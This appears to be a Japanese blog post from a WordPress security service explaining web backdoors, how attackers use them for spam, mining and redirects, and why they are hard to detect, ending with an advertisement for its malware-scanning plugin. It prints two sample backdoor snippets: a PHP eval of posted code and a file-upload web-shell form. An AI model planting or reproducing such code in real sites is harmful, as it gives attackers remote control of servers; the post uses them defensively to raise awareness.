バックドアとは
コンピュータセキュリティ用語としてのいわゆるバックドアは、本来はIDやパスワードを使って使用権を確認するコンピュータの機能を無許可で利用するために、コンピュータ内に(他人に知られることなく)設けられた通信接続の機能を指す。
引用 Wikipedia
と定義されます。
昨今では、ワードプレスの普及により、誰でも強力な情報発信のメディアが持てるようになり、そのウェブサイトを狙った 「WEBバックドア」といわれる種類のサーバーにあるプログラムを改ざんして設置される種類のバックドアが多数のお客様のサイトに確認されており、世界中で猛威を振るっています。
WEBバックドアの機能
WEBバックドアの機能は、ハッカーによって、サーバー上に任意のファイルを設置するまたは、他のファイルの内容を書き換える機能を有するファイルです。
管理者権限を奪ったハッカーはワードプレスのファイル書き出し機能を利用してバックドアをサーバー上に設置します。バックドア経由で様々な不正な活動をハッカーは行います。
●スパムメールの配信をおこなう
●他のサイトを攻撃するための踏み台とする
●サイトへのアクセスを別のサイトに転送してしまう
●仮想通貨のマイニングを行う
●どこかのサイトにリンクを貼って検索順位を上げようとする
●詐欺サイトをサーバー上で運用する
等他の方の迷惑となる行為や、最悪犯罪行為に加担させられる可能性があります。
WEBバックドアを発見・排除するのは難しい
一旦サイトがハッキングを受け、バックドアが設置されてしまうと、そのコードを発見するのは容易ではありません。
なぜなら、ワードプレスには一般的にテーマやプラグイン等も含めると5000ファイルを超えるファイルが含まれており、そのどのファイルに仕掛けてもハッカーにさえ位置がわかっていれば問題が無いからです。
また、ワードプレスを後から更新したり、プラグインを更新したりしてもバックドアは消えないようになっているものが大半で、一旦マルウェアを排除したとしてもバックドアがサーバー上に残っていると、何度でも不正なファイルをサーバー上にハッカーは置ける形となってしまいます。
WEBバックドアのコードの事例
バックドアのコードは極めてシンプルで短いことが多いです。例として下記のような構造をとります
@eval($_POST["code"]);
このコードはいかなるプログラムも、ハッカーが遠隔から送信してサーバー上で実行できるプログラムで、発見困難性を高めるために難読化されていた利します。
中には、ファイルがアップロードできるフォームが直接設置されている事例もございます。
<form enctype="multipart/form-data" action="$self" method="POST"> <input type="hidden" name="ac" value="upload"> <tr> <input size="5" name="file" type="file"></td> </tr> <tr> <td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td> $tend HTML; if (isset($_POST['path'])){ $uploadfile = $_POST['path'].$_FILES['file']['name']; if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} if (copy($_FILES['file']['tmp_name'], $uploadfile)) { echo "File ".$_FILES['file']['name']." uploaded"; } else { print "Not working: info:\n"; print_r($_FILES); } } break; }
このコードは難読化されておらず、極めて平易なコードで書かれているためバックドアと気づかれにくいものとなっておりワードプレスの本来のファイルとの差分を取らないと弊社でも発見が困難でございました。
(現在ではこのバックドアのパターンも把握しており検出可能です)
WEBバックドアは小規模なサイトにこそ仕掛けられています
私の持っているアクセス数がそれほど多くないサイトがハッキング被害を受けることはない。
と思われていませんか?
これは、大きな間違いでございます。ハッカーは膨大な量のウェブサイトをプログラムで自動的に巡回させ、セキュリティー上の脆弱性があるサイトを探し出して、どのような小規模なサイト、放置されているサイトも見逃さず改ざんファイルを設置します。
参考記事
ワードプレスでハッキングされてしまうサイトの特徴8選
他者が契約しているサーバーを自分の権限で自由にできれば、不正な行為を匿名で行えるうえに小規模なサイトや放置されているサイトであれば、それが発覚するまでの時間も稼げ、マルウェアの排除等にも技術的困難があるであろうことは容易に想像できるからです。
小規模サイトのセキュリティー対策や、ワードプレスの更新、マルウェアの排除の際は是非WPドクターにご相談ください。
ワードプレスドクターがリリースしているWEBバックドアを検出できるスキャナーはこちらです
WPドクター:マルウェアスキャン プラグイン